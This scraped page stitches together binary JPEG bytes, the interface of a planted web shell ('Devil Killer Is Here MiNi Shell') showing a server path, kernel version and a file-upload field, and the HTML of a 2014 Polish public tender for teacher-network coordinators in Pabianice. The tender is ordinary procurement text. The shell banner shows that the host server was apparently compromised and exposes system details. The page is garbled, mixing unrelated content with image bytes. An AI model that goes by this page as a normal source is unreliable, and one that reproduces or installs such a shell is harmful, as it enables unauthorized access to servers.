JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140722/159385-N-2014.html

<p class="kh_header"><b>Pabianice: PEŁNIENIE FUNKCJI KOORDYNATORA SIECI W RAMACH REALIZACJI PROJEKTU PN. NOWY SYSTEM DOSKONALENIA NAUCZYCIELI POWIATU PABIANICKIEGO - III POSTĘPOWANIE.</b><br>
<b>Numer ogłoszenia: 159385 - 2014; data zamieszczenia: 22.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Ośrodek Doskonalenia Nauczycieli i Doradztwa Metodycznego , ul. Kazimierza 8, 95-200 Pabianice, woj. łódzkie, tel. 42 215 42 42, faks 42 215 04 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://wwww.podn-pabianice.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI KOORDYNATORA SIECI W RAMACH REALIZACJI PROJEKTU PN. NOWY SYSTEM DOSKONALENIA NAUCZYCIELI POWIATU PABIANICKIEGO - III POSTĘPOWANIE..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający w imieniu Starostwa Powiatowego w Pabianicach jest realizatorem projektu pn. Nowy system doskonalenia nauczycieli powiatu pabianickiego - współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Priorytetu III Wysoka jakość systemu oświaty Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół, Programu Operacyjnego Kapitał Ludzki. Głównym celem projektu jest poprawa spójności i efektywności organizacji działań ukierunkowanych na doskonalenie nauczycieli powiatu pabianickiego poprzez opracowanie i wdrożenie Powiatowego  Programu Wspomagania w latach 2014 - 2015.
2. Przedmiotem zamówienia objętego niniejszym postępowaniem jest kompleksowe wspomaganie 28 placówek oświatowych biorących udział w projekcie (przedszkola, szkoły podstawowe, gimnazja, szkoły ponadgimnazjalne) poprzez wybór koordynatorów 4 niezależnych n/w sieci współpracy i samokształcenia:
a) Koordynator sieci I - sieci dyrektorów,
b) Koordynator sieci II - sieci nauczycieli I, 
c) Koordynator sieci III - sieci nauczycieli II, 
d) Koordynator sieci IV - sieci nauczycieli III.
W ramach każdej z sieci przewidziana jest realizacja usługi w wymiarze 459 godzin Zamawiający dopuszcza możliwość składania ofert częściowych według poniższego podziału. 
3. Podział na części:
3.1. Część I: Koordynator sieci I.
Zamawiający typuje n/w tematy do pracy w sieci:
a) Rola dyrektora w promocji i budowaniu wizerunku szkoły.
b) Budowa spójności edukacyjnej (poziom powiatu).
c) Zadania dyrektora w zakresie organizacji pomocy psychologiczno - pedagogicznej w szkole.
d) Pozapedagogiczne obowiązki dyrektora szkoły.
e) Promocja i budowanie wizerunku szkoły.
3.2. Część II: Koordynator sieci II.
a) Edukacja filmowa na lekcjach języka polskiego.
b) Skuteczne sposoby zachęcania uczniów do czytania.
c) Praca ze źródłem historycznym.
d) Jak rozwijać twórcze myślenie uczniów?
e) Temat dowolny zaproponowany przez nauczycieli uczestniczących w sieci.
3.3. Część III: Koordynator sieci III.
a) Doświadczenia i eksperymenty na zajęciach przedmiotów przyrodniczych.
b) Wycieczka jako forma nauczania przedmiotów przyrodniczych.
c) Matematyka w edukacji wczesnoszkolnej.
d) Jak wspierać dziecko w uczeniu się matematyki?
e) Praca z nowoczesnymi technologiami TIK (rok I) - bezpieczny Internet.
f) Temat dowolny zaproponowany przez nauczycieli uczestniczących w sieci.
3.4. Część IV: Koordynator sieci IV.
a) Praca z uczniem młodszym.
b) Praca z uczniem zdolnym na zajęciach koła naukowego.
c) Jak budować własny program nauczania?
d) Nauczyciele pracują zespołowo.
e) Jak radzić sobie ze szkolną absencją - bezpieczeństwo w szkole.
f) Temat dowolny zaproponowany przez nauczycieli uczestniczących w sieci.
Ostatecznego zatwierdzenia tematu każdej sieci dokonuje Koordynator projektu.
4. Do zadań każdego z koordynatorów sieci będzie należało:
4.1. Koordynacja pracy sieci poprzez:
a) Określenie obszarów i celów podejmowanych działań.
b) Przygotowanie harmonogramu pracy sieci.
c) Organizowanie i prowadzenie spotkań uczestników sieci (5 spotkań sieci w okresie obowiązywania umowy).
d) Pozyskanie ekspertów zewnętrznych - specjalistów w zakresie tematu pracy sieci.
e) Bieżące moderowanie sieci, w tym forum dyskusyjnego oraz forum wymiany doświadczeń dla uczestników (praca na platformie).
f) Udostępnianie materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci (praca na platformie).
g) Przygotowanie rocznego raportu oraz raportów miesięcznych z pracy sieci.
h) Wykonywanie innych czynności związanych z realizacja sieci, w tym prowadzenie bieżącej dokumentacji zgodnie z wytycznymi Zamawiającego. 
4.2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
4.3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego.
5. Wymagane jest, aby koordynator sieci posiadał m.in.:
- podstawową znajomość lokalnego środowiska oświatowego,
- umiejętności z zakresu moderowania grupy,
- umiejętność komunikacji interpersonalnej,
- umiejętność obsługi komputera i umiejętność pracy na platformie cyfrowej.
6. Kody CPV: 80.00.00.00-4 usługi edukacyjne.
7. Termin realizacji zamówienia (dla wszystkich części przedmiotu zamówienia): od  01.09.2014 roku do 30.06.2015 roku. 
8. W ramach realizacji usługi, Wykonawca winien spotkać się co najmniej raz w tygodniu z koordynatorem projektu w siedzibie Zamawiającego.
9. Średnia ilość godzin pracy na rzecz projektu w skali miesiąca kalendarzowego - 51.
10. Warunki finansowe rozliczeń:
10.1.	Rozliczenia wieloetapowe, będą następowały w systemie miesięcznym - miesięczne wynagrodzenie ryczałtowe - płatne z dołu.
10.2.	Wartość miesięcznego wynagrodzenia będzie ustalana na podstawie ilości wypracowanych w danym miesiącu godzin.
10.3.	Podstawą wystawienia faktury (rachunku) będzie podpisany protokół, potwierdzający realizację przedmiotu zamówienia za dany miesiąc.
10.4.	Każdorazowo faktura (rachunek) będzie przekazywany Zamawiającemu do 7 dnia kolejnego miesiąca za miesiąc poprzedni, z zastrzeżeniem iż za miesiąc grudzień 2014 roku, faktura (rachunek) zostanie wyjątkowo przekazany do 24 grudnia 2014 roku.
10.5.	Każdorazowo wynagrodzenie będzie płatne przelewem w terminie do 14 dni od daty otrzymania oryginału prawidłowo wystawionej faktury (rachunku).
10.6.	Podane w ofercie wynagrodzenie jest stałe i nie podlega waloryzacji w trakcie obowiązywania umowy.
10.7.	Wynagrodzenie zawiera również wszelkie koszty, jakie Wykonawca będzie zobowiązany ponieść z tytułu realizacji przedmiotu zamówienia, w szczególności kosztów dojazdu, zakwaterowania, rozmów telefonicznych komórkowych, itd. Ponadto podane przez Wykonawcę wynagrodzenie zawiera również inne koszty wynikające z realizacji zadania, bez których wykonanie zadania byłoby niemożliwe - podatek VAT, podatek dochodowy, opłaty na rzecz organów ZUS, Urzędu Skarbowego. W przypadku złożenia oferty przez Wykonawcę, który nie prowadzi działalności gospodarczej, wszelkie zobowiązania, takie jak podatek dochodowy, opłaty na rzecz organów ZUS, Urzędu Skarbowego, będą potrącane przez Zamawiającego i wnoszone w imieniu Wykonawcy na rzecz odpowiednich instytucji..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których jest mowa w art. 67  ust. 1 pkt. 6 ustawy PZP do wysokości 20% wartości zamówienia podstawowego i polegających na powtórzeniu zamówień o tym samym charakterze</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w przedmiotowym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia oraz przedstawienie dokumentów potwierdzających dysponowanie min. jedną osobą posiadającą łącznie następujące kwalifikacje zawodowe:
Część I - sieć I:
- ukończone co najmniej studia wyższe II stopnia z przygotowaniem pedagogicznym,
- ukończone studia podyplomowa lub kurs kwalifikacyjny z zarządzania w oświacie,
- uzyskany stopień awansu zawodowego minimum nauczyciel mianowany,
Część I, II, III - sieci II, III, IV (po jednej osobie w każdej sieci):
- ukończone co najmniej studia wyższe II stopnia z przygotowaniem pedagogicznym,
- uzyskany stopień awansu zawodowego minimum nauczyciel mianowany,
ocena spełniania warunku nastąpi w oparciu o sprawdzenie oświadczenia, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o braku podstaw do wykluczenia. Ocena spełniania warunku nastąpi w oparciu o oświadczenie oraz dokumenty, które Wykonawca złoży w ofercie, ocena nastąpi według formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wykaz (wzór w SIWZ) osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - do wykazu należy dołączyć oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia; 
b) formularz cenowy (wzór w SIWZ). 
c) oświadczenie (wzór w SIWZ) potwierdzające: - podstawową znajomość lokalnego środowiska oświatowego, - umiejętności z zakresu moderowania grupy, - umiejętność komunikacji interpersonalnej, - umiejętność obsługi komputera i umiejętność pracy na platformie cyfrowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wwww.podn-pabianice.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pabianice, ul. Kazimierza 8..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2014 godzina 10:00, miejsce: Pabianice, ul. Kazimierza 8..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Unii Europejskiej w ramach
Europejskiego Funduszu Społecznego w ramach Priorytetu III Wysoka jakość systemu oświaty Działanie 3.5. Kompleksowe wspomaganie rozwoju szkół, Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator sieci I - sieci dyrektorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający typuje n/w tematy do pracy w sieci: 
a) Rola dyrektora w promocji i budowaniu wizerunku szkoły. 
b) Budowa spójności edukacyjnej (poziom powiatu). 
c) Zadania dyrektora w zakresie organizacji pomocy psychologiczno - pedagogicznej w szkole. 
d) Pozapedagogiczne obowiązki dyrektora szkoły. 
e) Promocja i budowanie wizerunku szkoły. 
Ostatecznego zatwierdzenia tematu każdej sieci dokonuje Koordynator projektu. 
1. Koordynacja pracy sieci poprzez: 
a) Określenie obszarów i celów podejmowanych działań. 
b) Przygotowanie harmonogramu pracy sieci. 
c) Organizowanie i prowadzenie spotkań uczestników sieci (5 spotkań sieci w okresie obowiązywania umowy). 
d) Pozyskanie ekspertów zewnętrznych - specjalistów w zakresie tematu pracy sieci. 
e) Bieżące moderowanie sieci, w tym forum dyskusyjnego oraz forum wymiany doświadczeń dla uczestników (praca na platformie). 
f) Udostępnianie materiałów samokształceniowych i innych zasobów
edukacyjnych łączących się z tematyką sieci (praca na platformie). 
g) Przygotowanie rocznego raportu oraz raportów miesięcznych z pracy sieci. h) Wykonywanie innych czynności związanych z realizacja sieci, w tym prowadzenie bieżącej dokumentacji zgodnie z wytycznymi Zamawiającego.
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być
prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Koordynator sieci II - sieci nauczycieli I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający typuje n/w tematy do pracy w sieci: 
a) Edukacja filmowa na lekcjach języka polskiego. 
b) Skuteczne sposoby zachęcania uczniów do czytania. 
c) Praca ze źródłem historycznym. 
d) Jak rozwijać twórcze myślenie uczniów? 
e) Temat dowolny zaproponowany przez nauczycieli uczestniczących w sieci.
Ostatecznego zatwierdzenia tematu każdej sieci dokonuje Koordynator projektu. 
1. Koordynacja pracy sieci poprzez: 
a) Określenie obszarów i celów podejmowanych działań. 
b) Przygotowanie harmonogramu pracy sieci. 
c) Organizowanie i prowadzenie spotkań uczestników sieci (5 spotkań sieci w okresie obowiązywania umowy). 
d) Pozyskanie ekspertów zewnętrznych - specjalistów w zakresie tematu pracy sieci. 
e) Bieżące moderowanie sieci, w tym forum dyskusyjnego oraz forum
wymiany doświadczeń dla uczestników (praca na platformie). 
f) Udostępnianie materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci (praca na platformie). 
g) Przygotowanie rocznego raportu oraz raportów miesięcznych z pracy sieci. 
h) Wykonywanie innych czynności związanych z realizacja sieci, w tym prowadzenie bieżącej dokumentacji zgodnie z wytycznymi Zamawiającego. 
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Koordynator sieci III - sieci nauczycieli II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający typuje n/w tematy do pracy w sieci: 
a) Doświadczenia i eksperymenty na zajęciach przedmiotów przyrodniczych. 
b) Wycieczka jako forma nauczania przedmiotów przyrodniczych. 
c) Matematyka w edukacji wczesnoszkolnej. 
d) Jak wspierać dziecko w uczeniu się matematyki? 
e) Praca z nowoczesnymi technologiami TIK (rok I) - bezpieczny Internet. 
f) Temat dowolny zaproponowany przez nauczycieli uczestniczących w sieci. Ostatecznego zatwierdzenia tematu każdej sieci dokonuje Koordynator projektu. 
1. Koordynacja pracy sieci poprzez: 
a) Określenie obszarów i celów podejmowanych działań. 
b) Przygotowanie harmonogramu pracy sieci. 
c) Organizowanie i prowadzenie spotkań uczestników sieci (5 spotkań sieci w okresie obowiązywania umowy). 
d) Pozyskanie ekspertów zewnętrznych - specjalistów w zakresie tematu pracy sieci. 
e) Bieżące moderowanie sieci, w tym forum dyskusyjnego oraz forum wymiany doświadczeń dla uczestników (praca na platformie). 
f) Udostępnianie materiałów samokształceniowych i innych zasobów edukacyjnych łączących się z tematyką sieci (praca na platformie). 
g) Przygotowanie rocznego raportu oraz raportów miesięcznych z pracy sieci. h) Wykonywanie innych czynności związanych z realizacja sieci, w tym prowadzenie bieżącej dokumentacji zgodnie z wytycznymi Zamawiającego.
2. Prowadzenie dokumentacji dotyczącej realizowanej funkcji, w tym karty czasu pracy według wskazań Zamawiającego i dostarczanie prowadzonej dokumentacji w terminie wskazanym przez Zamawiającego. Wszelka dokumentacja sporządzona w ramach realizacji zamówienia powinna być prowadzona na drukach zawierających podane przez Zamawiającego logo i nazwę projektu. 
3. Współpraca z personelem projektu i uwzględnianie w działaniach wskazań Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
